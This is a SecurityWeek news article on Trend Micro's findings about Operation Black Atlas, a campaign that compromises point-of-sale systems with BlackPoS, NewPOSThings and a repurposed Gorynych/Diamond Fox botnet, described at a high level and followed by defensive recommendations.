Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Operation Black Atlas Continues to Compromise PoS Systems

Operation Black Atlas, a campaign aimed at infecting point of sale (PoS) systems around the world, has managed to infect more companies and is using the modular Gorynych/Diamond Fox botnet to exfiltrate data, Trend Micro researchers warn.

Operation Black Atlas, a campaign aimed at infecting point of sale (PoS) systems around the world, has managed to infect more companies and is using the modular Gorynych/Diamond Fox botnet to exfiltrate data, Trend Micro researchers warn.

Earlier this month, the security company revealed that cybercriminals were using multiple tools to compromise businesses that use card payment systems, including those in healthcare and retail, and to infect targeted systems with various PoS malware, including the BlackPOS malware.

Trend Micro said the cybercriminals behind Operation Black Atlas are using a variety of pen testing tools to discover vulnerable systems, including brute force or dictionary attack tools, SMTP (Simple Mail Transfer Protocol) scanners, and remote desktop viewers. They used a “shotgun” approach to infiltrate networks by checking available ports on the Internet on multiple targets at once, the researches said.

The operation was focused on spreading a variety of malware, including BlackPoS, also known as Kaptoxa, while the masterminds behind it were also looking to steal user credentials to sites that contain sensitive information, email accounts, and Facebook. The operation is aimed at small and medium-sized businesses across the globe, and appears to be successfully infecting targets across a variety of industries.

Most recently, the infection spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop, Trend Micro said in a new blog post on the operation.

The security company also explains that the cybercriminals behind Black Atlas introduce PoS threats in the compromised systems by abusing a legitimate function, the Windows Background Intelligent Transfer Service (BITS) or bitsadmin.exe. The function is used for transferring files to and from Microsoft and is mostly used for system updates, as it can easily bypass firewalls.

As part of this operation, bad actors use BITS to download NewPOSThings, a piece of malware that includes functions such as RAM scraper, keylogger, keep-alive reporting, and data transfer routines. Moreover, they load a variant of Neutrino or Kasidet, also with PoS card-scraping functionality, as well as CenterPOS, Project Hook, and PwnPOS in some cases.

The cybercriminals running Black Atlas also managed to build a replica of the Gorynych / Diamond Fox botnet malware and repurposed it to specifically look for the output file of the BlackPoS malware, which includes harvested credit card data. The modular botnet also includes plugins for getting screenshots, passwords, mails, and more.

Advertisement. Scroll to continue reading.

The security researchers explain that Gorynych routines focus mainly on anti-analysis, information theft, and installations, and that the plugins provide it with increased functionality. The Diamond Fox builder has the keylogger and PoS grabber functionalities disabled by default, but they have been turned on as part of operation Black Atlas.

After infection, Gorynych downloads its plugins and reports to its server via gate.php using HTTP POST, while using its own user-agent that can be found in the configuration file. The information is encrypted using a simple XOR operation, Trend Micro explained. The security researchers also managed to extract hashes, addresses, and other indicators related to Gorynych and included them an IOC document, and offer details on the entire operation Black Atlas in a technical brief.

The security firm notes that companies threatened by this operation should assess their security posture and apply multiple PoS strategies, with network segmentation and isolation of cardholder data environment from other networks considered a standard approach. Large organizations should eliminate unnecessary data and monitor the remaining information, while also ensuring that essential controls are running via regular security checks and that event logs are monitored as well.

 

Written By

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Cybercrime

Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.